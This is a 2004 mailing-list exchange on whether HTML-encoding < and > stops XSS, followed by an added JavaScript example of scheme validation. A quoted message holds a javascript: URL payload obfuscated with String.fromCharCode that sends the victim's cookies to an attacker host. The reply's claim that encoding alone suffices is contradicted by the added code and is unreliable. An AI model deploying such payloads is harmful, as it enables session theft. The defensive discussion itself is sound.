Re: [Re: AppSec FAQ at OWASP]

From: Rohyt Belani (rohytbelanihotmail.com)
Date: Fri Jan 30 2004 - 09:43:28 CST


In-Reply-To: <02ca01c3e706$59b8f720$ec658009pprados>

>
>> An easier solution to prevent XSS attacks might be to HTML encode the "<"
>> and ">" characters as &lt and &gt. So even if they are accepted as input
>> from the user, it would not result in the execution of a script like
>> &lt;script&gt;...&lt;/script&gt;.
>
>
>It's not correct. With this code :
><a href="<%= escapeHTML(url)%>/doc.html">Document</a>
>
>The hacker can inject in the variable url the value :
>javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62))
>and execute a script without <, > or &!
>
>Phil
>

The solution I proposed for HTML encoding characters like < and > will still be effective in the case you mentioned.
This is because the underlying principle for good input validation routines is to first decode the encoded URL and then perform input validation. By doing so, all encoding attacks like the one you mentioned can be prevented from executing successfully.
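To make the two controls discussed in this exchange concrete, here is an added example; it is not code from either poster. It implements an `escapeHTML` like the one in Phil's template and shows that a `javascript:` value contains nothing for it to encode, beside a separate check that decodes the value and then validates its URL scheme before it is placed in `href`. The helper names (`escapeHTML`, `isSafeHref`, `renderLinkSafely`), the http/https allowlist and the sample inputs are assumptions made for illustration.

```javascript
// Added example, not code from either poster in this thread. Names
// (escapeHTML, isSafeHref, renderLinkSafely) and the http/https allowlist are
// assumptions made for illustration.

// Entity-encode the characters that matter in HTML text and in a
// double-quoted attribute value.
function escapeHTML(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The template pattern from Phil's message:
// <a href="<%= escapeHTML(url)%>/doc.html">Document</a>
function renderLink(url) {
  return '<a href="' + escapeHTML(url) + '/doc.html">Document</a>';
}

// Decode percent-encoding first, then validate the scheme against an
// allowlist. A value with no scheme is treated as a relative path. Decoding
// before checking makes the test conservative: a value that would only turn
// into "javascript:" after another round of decoding is rejected as well.
const ALLOWED_SCHEMES = new Set(['http', 'https']);

function isSafeHref(raw) {
  let decoded;
  try {
    decoded = decodeURIComponent(String(raw));
  } catch (e) {
    return false; // malformed percent-encoding: reject rather than guess
  }
  // Browsers skip leading whitespace and control characters before the scheme
  // and match the scheme case-insensitively, so normalise the same way.
  const normalized = decoded.replace(/^[\s\u0000-\u001f]+/, '');
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(normalized);
  if (m === null) {
    return true; // no scheme: relative URL such as "docs/intro"
  }
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Validation first, encoding second: each control covers a different context
// (the URL scheme versus the HTML attribute the URL is written into).
function renderLinkSafely(url) {
  if (!isSafeHref(url)) {
    throw new Error('rejected href value: ' + JSON.stringify(url));
  }
  return renderLink(url);
}

// Constructed sample inputs.
const SAMPLES = {
  benign: 'https://example.org/docs',
  relative: 'docs/intro',
  scriptTag: '<script>alert(1)</script>',
  hostile: 'javascript:alert(1)',        // contains no <, > or & to encode
  spacedHostile: '  JavaScript:alert(1)',
  encodedHostile: 'java%73cript:alert(1)',
};

// Run every sample through both controls and report what each one did.
function demo() {
  const results = {};
  for (const [name, value] of Object.entries(SAMPLES)) {
    let rendered;
    try {
      rendered = renderLinkSafely(value);
    } catch (e) {
      rendered = null;
    }
    results[name] = {
      escaped: escapeHTML(value),
      encodingChangedIt: escapeHTML(value) !== value,
      accepted: rendered !== null,
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the `<script>` sample neutralised by encoding alone while the `javascript:` samples pass through `escapeHTML` byte-for-byte and are stopped only by the scheme check. One caveat: a scheme-relative value such as `//other-host/path` has no scheme and passes this check as a relative URL; if the application must not link off-site, add a host check as well.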